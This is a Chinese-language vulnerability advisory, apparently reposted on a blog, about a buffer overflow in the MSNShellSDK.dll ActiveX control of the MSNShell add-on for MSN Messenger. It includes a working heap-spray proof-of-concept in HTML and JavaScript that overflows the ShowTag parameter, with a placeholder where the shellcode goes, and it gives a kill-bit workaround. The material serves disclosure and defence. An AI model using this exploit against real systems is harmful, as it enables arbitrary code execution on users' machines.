msnshell远程代码执行漏洞

受影响系统:

MSNShell MSNShell

描述:


MSNShell是MSN Messenger的功能增强包,提供多种扩展服务及功能。

MSNShell所安装的MSNShellSDK.dll ActiveX控件没有正确地验证用户所提供的ShowTag参数长度,当长度为540字节左右的时可能缓冲区溢出,导致执行任意代码。

<*来源:疯狗
  
  链接:http://huaidan.org/archives/3491.html
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>

<object classid="clsid:BFB06F62-190C-42F6-91B1-3CB03560FE2D" id=’target’></object>

<body>

<SCRIPT language="JavaScript">

var shellcode = unescape("you shellcode is here");

var bigblock = unescape("%u0C0C%u0C0C");

var headersize = 20;

var slackspace = headersize+shellcode.length;

while (bigblock.length<slackspace) bigblock+=bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length+slackspace<0x40000) block = block+block+fillblock;

memory = new Array();

for (x=0; x<350; x++) memory[x] = block +shellcode;

var buffer = ”;

while (buffer.length < 540 ) buffer+=’\x0C\x0C\x0C\x0C’;

target.ShowTag(buffer);

</script>

</body>

</html>

建议:


临时解决方法:

* 对clsid BFB06F62-190C-42F6-91B1-3CB03560FE2D设置kill bit。

厂商补丁:

MSNShell
——–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.msnshell.net/index.html

发表评论?

0 条评论。

发表评论